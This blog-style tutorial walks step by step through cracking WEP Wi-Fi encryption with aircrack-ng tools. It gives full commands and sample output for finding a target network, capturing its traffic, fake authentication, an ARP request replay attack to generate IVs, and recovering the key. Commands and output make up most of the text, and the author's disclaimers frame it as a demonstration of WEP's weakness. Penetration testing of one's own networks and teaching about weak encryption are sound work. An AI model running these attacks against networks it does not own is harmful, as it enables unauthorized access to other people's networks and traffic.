Hacking WEP in under 10 minutes
WEP, also known as Wired Equivalent Privacy is a form of encryption used in early WiFi networks. While its not recommended today they're are still a very high percentage of people still using it. As with most technology people just set it and forget it leaving a high number of under secured networks in the air waves. As always I am not recommending you try hacking your neighbors WiFi networks. This should be done with all of your own equipment.
To start out with we need to find our target network. For this we will use airodump-ng
Run the following command to get started. Replace your interface with the command below.
| airodump-ng wlan1 |
The output should look something like this
CH 9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:26:46:0B -29 19 1 0 6 54e WEP WEP linksys 28:EF:01:5D:43:58 -42 17 0 0 6 54e WPA2 CCMP PSK NETGEAR BSSID STATION PWR Rate Lost Packets Probes 28:EF:01:26:46:0B 28:EF:01:DB:36:A4 -57 0 - 1 0 1 linksys |
As you can see we have an access point using WEP with the SSID "linksys" and we also have a client attached to this access point.
In order for this attack to work we must have traffic in the form of an attached client. While its possible without for this how-to we will be hacking WEP with a client authenticated. We will talk more about hacking WEP without an active client in another article.
First we need to start capturing packets from the access point to do this we will filter out everything but the target access point.
| airodump-ng -c 6 --bssid 28:EF:01:26:46:0B -w ./linksys.wep wlan1 |
The switches to this command are below
-c = channel from the target access point
--bssid = MAC address from the target access point
-w = path and name of capture files. I named mine "linksys.wep" as a descriptive name but the name is irrelevant, make it whatever you want.
The output should look like this. Leave this window open and running.
CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:26:46:0B -29 19 1 0 6 54e WEP WEP linksys BSSID STATION PWR Rate Lost Packets Probes |
Now we need to fake authentication with the target router. To do this we will use aireplay-ng with the command below in a new terminal window.
| aireplay-ng -1 0 -e linksys -a 28:EF:01:26:46:0B -h {adaptor MAC} wlan1 |
The switches to this command are below.
-1 = Attack mode 1= fake authentication
0 = Delay between attacks
-e = essid of target access point
-a = MAC address of target access point
-h = MAC address from your adaptor (In my case wlan1)
You should get output like this telling you it was successful.
13:54:17 Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6 13:54:17 Sending Authentication Request (Open System) [ACK] 13:54:17 Authentication successful 13:54:17 Sending Association Request [ACK] 13:54:17 Association successful :-) (AID: 1) |
You will also notice your MAC address as now connected to the client in the instance of airodump-ng you have running. If it does not show up in airodump-ng then you may have done something wrong. Just try the above command again and check the essid and MAC address is for the target access point and make sure you are using your right MAC address by typing ifconfig. You need to use the MAC address of the adaptor you are using to perform the attack. If your MAC is spoofed make sure to use the spoofed MAC.
After you run this command you need to run an arp request re-injection attack to create as many IV's as possible. The IV's or initialization vectors are what make WEP so weak. WEP uses a 24 bit IV so since this is so small and transmitted in clear text the IV's are reused and because of that we are able to extrapolate the WEP key if enough of them are captured. Since we don't want to wait ages to collect the required number if IV's, 30 to 40 thousand is what I recommend, we will use aireplay-ng to conduct an arp request re-injection attack to make the access point start spiting out IV's.
Basically what we are doing is listening for arp requests and bouncing them back to the router when we see them. Each time the router will retransmit the arp request with a new IV. These IV's are collected in airodump-ng and can be used in aircrack-ng later.
Now time to have some fun. Type this command below.
| aireplay-ng -3 -b 28:EF:01:26:46:0B -h {adaptor} wlan1 |
The switches to this command are below.
-3 = Attack mode 3 = ARP Request Replay Attack
-b = MAC address of target router
-h = MAC address to your adaptor
The output here depends on how many clients are authenticated. The more traffic the better. If you only have a single client like I did you might have to be patient but after a minute or so the arp requests should start flying. Here is what the output should look like.
13:57:51 Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6 Saving ARP requests in replay_arp-0520-135751.cap You should also start airodump-ng to capture replies. ^Cad 152425 packets (got 71155 ARP requests and 40654 ACKs), sent 52101 packets...(499 pps) |
I usually wait until I have about 40,000+ ACKs. The more the better. Just be patient and let airodump-ng capture all of those arp replies, they are what contains the IV's we need.
Once you are happy with what you have hit Ctrl+c to stop the ARP attack. At this point you can also kill airodump-ng or leave it running its up to you. We should have what we need already.
The final step is to run aircrack-ng against the cap file that airodump-ng created while you where doing all of this.
For that run this command.
| aircrack-ng ./linksys.wep.cap |
The output of this command should give you the WEP key as it does below.
Opening ./linksys.wep.cap Read 239747 packets. # BSSID ESSID Encryption 1 28:EF:01:26:46:0B linksys WEP (58246 IVs) Choosing first network as target. Opening ./linksys.wep.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 58258 ivs. KEY FOUND! [ F2:C7:BB:35:B9 ] Decrypted correctly: 100% |
And that's it. How can it get any easier then that. It took my 1.677Ghz dual core Atom netbook about 2 seconds to find the WEP key once the packets where captured. With practice this entire attack can be done in about 10 minutes or less, and that incudes the time it takes to set up.
Thanks for reading and I hope you enjoyed it. Remember this information is meant to show you the dangers of using WEP encryption it is not intended to teach you how to hack your neighbors router and cause trouble. Please don't use this information to hurt other people. Not only is it illegal but its also not very nice. ;-)
Stay informed!
Previous issues
